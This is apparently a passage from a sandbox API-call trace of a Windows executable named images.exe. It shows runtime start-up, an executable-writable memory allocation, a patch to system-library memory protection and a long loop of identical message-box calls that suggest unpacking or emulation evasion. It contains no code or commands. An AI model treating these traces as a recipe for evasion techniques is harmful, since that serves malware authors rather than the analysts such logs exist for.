¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0285.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0285.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0285.227] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x12Ám\x87Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0285.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8a6ce8 [0285.229] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x54c488, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0285.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x22) returned 0x8a2340 [0285.229] RtlInitializeSListHead (in: ListHead=0x54c3c0 | out: ListHead=0x54c3c0) [0285.229] GetLastError () returned 0x0 [0285.229] SetLastError (dwErrCode=0x0) [0285.229] GetEnvironmentStringsW () returned 0x8b2058* [0285.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0285.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50d) returned 0x8b2a80 [0285.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x8b2a80, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0285.229] FreeEnvironmentStringsW (penv=0x8b2058) returned 1 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x90) returned 0x8aa038 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1f) returned 0x8a6ca8 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e) returned 0x8a7e10 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x37) returned 0x8ae700 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x3c) returned 0x8ac7a0 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x31) returned 0x8ae980 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x14) returned 0x8a6eb8 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x24) returned 0x8b2f98 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0xd) returned 0x8a9f48 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1d) returned 0x8aa638 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x31) returned 0x8ae680 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x15) returned 0x8b2fc8 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x17) returned 0x8aa660 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0xe) returned 0x8a9df8 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x69) returned 0x8a79b8 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x3e) returned 0x8acc68 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1b) returned 0x8a6a70 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1d) returned 0x8a6a98 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x48) returned 0x8a1a18 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x12) returned 0x8a1a68 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x18) returned 0x8b2360 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1b) returned 0x8a6f38 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x24) returned 0x8a6f60 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x29) returned 0x8a7eb8 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1e) returned 0x8a6290 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x6b) returned 0x8a6af8 [0285.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x17) returned 0x8b2400 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0xf) returned 0x8a9d68 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x16) returned 0x8b21c0 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2a) returned 0x8a7e48 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x29) returned 0x8a7ef0 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x12) returned 0x8b2440 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x21) returned 0x8a62b8 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x16) returned 0x8b2420 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x22) returned 0x8a1818 [0285.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x12) returned 0x8b2080 [0285.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b2a80 | out: hHeap=0x8a0000) returned 1 [0285.233] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x75ac0000 [0285.327] GetProcAddress (hModule=0x75ac0000, lpProcName="SleepConditionVariableCS") returned 0x75bf7f60 [0285.327] GetProcAddress (hModule=0x75ac0000, lpProcName="WakeAllConditionVariable") returned 0x777c8d70 [0285.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x800) returned 0x8b2460 [0285.329] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0285.329] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x407f5e) returned 0x0 [0285.398] GetProcessHeap () returned 0x8a0000 [0285.399] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0285.399] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0285.400] GetCurrentThreadId () returned 0xfa4 [0285.400] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0285.400] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0285.401] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\" " [0285.401] CoInitialize (pvReserved=0x0) returned 0x0 [0285.491] VirtualAlloc (lpAddress=0x0, dwSize=0xa00000, flAllocationType=0x3000, flProtect=0x40) returned 0x21f0000 [0285.491] VirtualProtect (in: lpAddress=0x7574fec0, dwSize=0x100, flNewProtect=0x40, lpflOldProtect=0x19feb4 | out: lpflOldProtect=0x19feb4*=0x20) returned 1 [0285.499] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.499] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.500] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.501] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.502] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.503] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.505] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.506] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.507] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.508] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned 